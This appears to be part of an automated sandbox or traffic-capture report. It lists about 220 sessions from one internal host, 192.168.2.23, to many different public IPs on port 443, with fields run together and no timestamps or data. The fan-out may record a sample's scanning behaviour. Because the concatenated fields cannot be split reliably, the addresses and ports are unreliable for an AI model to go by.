                                                9719192.168.2.2341516111.28.142.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9720192.168.2.2342084151.127.150.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9721192.168.2.2359894147.139.42.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9722192.168.2.2360636132.188.144.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9723192.168.2.2347162137.120.245.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9724192.168.2.233640054.55.107.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9725192.168.2.2346932161.105.128.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9726192.168.2.2335960121.87.120.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9727192.168.2.2337532187.159.42.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9728192.168.2.2360866217.84.10.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9729192.168.2.234121275.17.107.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9730192.168.2.2334808162.253.147.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9731192.168.2.2347060187.5.229.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9732192.168.2.2355270120.150.22.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9733192.168.2.2348044175.243.209.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9734192.168.2.233727213.244.57.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9735192.168.2.2338604145.184.6.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9736192.168.2.2355438187.61.140.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9737192.168.2.2333502143.127.94.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9738192.168.2.2338460201.19.220.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9739192.168.2.2335522217.161.218.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9740192.168.2.233862218.92.28.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9741192.168.2.233875273.122.71.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9742192.168.2.236047044.107.27.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9743192.168.2.2348420185.56.167.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9744192.168.2.235215097.79.65.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9745192.168.2.234392818.60.66.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9746192.168.2.2338092145.114.45.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9747192.168.2.2341074209.254.27.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9748192.168.2.2353864130.212.140.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9749192.168.2.2335610175.62.244.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9750192.168.2.2344000131.95.165.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9751192.168.2.23465768.176.52.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9752192.168.2.2345248197.94.231.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9753192.168.2.23379349.5.33.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9754192.168.2.235283813.124.54.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9755192.168.2.2332974120.32.27.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9756192.168.2.2356974118.255.229.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9757192.168.2.2335418100.50.13.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9758192.168.2.2342266218.52.107.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9759192.168.2.233303495.153.130.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9760192.168.2.235383650.165.15.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9761192.168.2.2350454111.129.255.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9762192.168.2.2346792217.63.39.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9763192.168.2.2340016166.24.87.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9764192.168.2.2339560178.242.9.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9765192.168.2.233375252.252.146.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9766192.168.2.235809897.31.74.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9767192.168.2.2335538133.6.153.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9768192.168.2.234418057.112.254.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9769192.168.2.23389809.78.36.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9770192.168.2.2345162149.123.63.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9771192.168.2.233755246.157.15.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9772192.168.2.234523086.178.48.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9773192.168.2.2333370220.144.202.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9774192.168.2.2349066129.224.230.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9775192.168.2.235330452.104.200.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9776192.168.2.2354782102.146.171.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9777192.168.2.235482661.55.101.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9778192.168.2.2335714158.179.254.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9779192.168.2.2337812133.140.80.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9780192.168.2.2350366163.173.224.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9781192.168.2.23418068.8.25.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9782192.168.2.2338862223.58.8.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9783192.168.2.2358594177.135.204.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9784192.168.2.2346758223.246.203.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9785192.168.2.235709247.116.136.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9786192.168.2.2335478162.175.154.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9787192.168.2.2351792102.193.103.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9788192.168.2.2343466105.67.123.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9789192.168.2.2345730177.45.196.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9790192.168.2.234001292.190.226.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9791192.168.2.234387064.177.148.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9792192.168.2.2336568141.232.12.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9793192.168.2.2343370197.25.53.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9794192.168.2.235515047.10.72.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9795192.168.2.2354362207.191.200.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9796192.168.2.234770225.12.105.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9797192.168.2.234399024.143.170.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9798192.168.2.235324875.10.185.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9799192.168.2.2352782151.194.65.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9800192.168.2.233539689.111.183.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9801192.168.2.234366872.218.83.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9802192.168.2.2344498191.229.129.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9803192.168.2.2343904134.100.8.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9804192.168.2.2332936210.94.71.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9805192.168.2.234853891.123.47.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9806192.168.2.2351568172.138.112.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9807192.168.2.2344100209.66.88.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9808192.168.2.235126682.77.114.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9809192.168.2.23584749.160.64.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9810192.168.2.235110090.54.183.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9811192.168.2.235025814.90.192.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9812192.168.2.2350644158.115.52.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9813192.168.2.2342854114.231.51.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9814192.168.2.2348948190.188.165.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9815192.168.2.2344332178.5.90.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9816192.168.2.2359384177.164.223.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9817192.168.2.2360588221.43.156.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9818192.168.2.233312666.211.1.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9819192.168.2.2347124203.162.229.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9820192.168.2.2358706182.148.128.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9821192.168.2.2346766141.7.33.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9822192.168.2.235945294.197.203.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9823192.168.2.2350196158.132.184.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9824192.168.2.233955686.67.71.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9825192.168.2.233954825.46.53.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9826192.168.2.2351666209.72.21.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9827192.168.2.2357228123.24.128.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9828192.168.2.2344164157.109.233.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9829192.168.2.2354536109.144.186.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9830192.168.2.233553436.203.177.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9831192.168.2.2340908217.176.151.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9832192.168.2.2337604177.137.153.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9833192.168.2.2340396118.39.172.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9834192.168.2.235864057.45.42.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9835192.168.2.235531225.24.220.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9836192.168.2.2344116103.71.208.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9837192.168.2.2354782217.170.22.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9838192.168.2.2346242210.29.188.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9839192.168.2.234424250.54.216.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9840192.168.2.235212250.239.201.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9841192.168.2.2338094183.197.95.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9842192.168.2.235631078.169.17.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9843192.168.2.2349860106.131.124.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9844192.168.2.234815057.187.30.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9845192.168.2.2353996147.219.164.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9846192.168.2.2341096187.82.205.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9847192.168.2.234053847.99.223.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9848192.168.2.235264266.186.214.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9849192.168.2.2352134152.62.217.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9850192.168.2.2350374209.29.131.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9851192.168.2.2336964164.102.38.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9852192.168.2.236047853.81.58.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9853192.168.2.2337826145.211.108.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9854192.168.2.234575817.205.184.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9855192.168.2.234392044.65.101.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9856192.168.2.234139442.211.157.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9857192.168.2.2340880212.81.116.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9858192.168.2.234208039.129.15.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9859192.168.2.2344160139.89.119.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9860192.168.2.2346084154.166.69.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9861192.168.2.2336388177.157.165.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9862192.168.2.23577342.57.220.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9863192.168.2.233370444.210.37.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9864192.168.2.234742061.74.193.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9865192.168.2.2360834189.185.248.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9866192.168.2.2346040204.61.80.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9867192.168.2.234922653.249.197.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9868192.168.2.233968823.255.4.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9869192.168.2.2340672173.178.139.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9870192.168.2.2349300203.66.17.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9871192.168.2.2353570174.71.109.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9872192.168.2.2345756135.60.60.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9873192.168.2.2335180101.212.155.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9874192.168.2.2333932198.243.196.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9875192.168.2.235353291.217.155.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9876192.168.2.234900834.13.126.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9877192.168.2.2335808204.251.157.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9878192.168.2.2346046130.54.174.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9879192.168.2.2358178153.98.126.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9880192.168.2.2352276178.96.108.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9881192.168.2.2349592206.57.124.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9882192.168.2.2343614187.199.220.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9883192.168.2.2354960210.125.112.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9884192.168.2.2351062168.248.75.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9885192.168.2.234045072.54.97.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9886192.168.2.2333692121.90.84.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9887192.168.2.236033052.220.145.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9888192.168.2.2348178198.94.234.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9889192.168.2.234435669.60.120.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9890192.168.2.2333068139.41.138.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9891192.168.2.2356662106.222.252.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9892192.168.2.2337418109.42.79.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9893192.168.2.235739832.53.62.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9894192.168.2.2343518135.255.104.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9895192.168.2.2355488222.243.72.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9896192.168.2.235755019.171.69.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9897192.168.2.2355438203.165.3.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9898192.168.2.235930898.252.64.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9899192.168.2.2339782202.252.127.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9900192.168.2.234216054.198.85.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9901192.168.2.2339790184.120.81.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9902192.168.2.2338938183.64.47.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9903192.168.2.2354340187.144.84.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9904192.168.2.2358512156.133.47.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9905192.168.2.233955635.56.174.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9906192.168.2.2355026213.179.162.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9907192.168.2.2345020147.164.200.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9908192.168.2.2348798209.40.96.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9909192.168.2.2355858135.242.191.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9910192.168.2.2358782162.10.83.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9911192.168.2.2333948223.102.108.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9912192.168.2.2335560112.182.68.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9913192.168.2.2338068222.86.38.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9914192.168.2.2357448217.45.173.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9915192.168.2.2345910155.192.163.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9916192.168.2.2356724150.102.101.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9917192.168.2.235129041.241.1.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9918192.168.2.235320246.160.93.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9919192.168.2.2345626146.135.16.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9920192.168.2.2349376184.10.224.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9921192.168.2.233515227.200.243.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9922192.168.2.2338968199.20.119.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9923192.168.2.2342422223.58.3.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9924192.168.2.2351826209.219.100.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9925192.168.2.2356488147.180.30.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9926192.168.2.2339618123.115.234.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9927192.168.2.2358982135.148.177.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9928192.168.2.234268248.126.56.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9929192.168.2.234841636.123.52.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9930192.168.2.2355144120.127.3.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9931192.168.2.2348884148.140.87.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9932192.168.2.23392402.221.125.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9933192.168.2.234942266.214.168.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9934192.168.2.233700059.151.174.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9935192.168.2.2359674137.67.55.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9936192.168.2.2359784120.97.25.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9937192.168.2.2358540185.14.163.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9938192.168.2.234605673.13.65.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9939192.168.2.234273299.234.237.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9940192.168.2.235276620.215.222.76443
                                                TimestampBytes transferredDirectionData


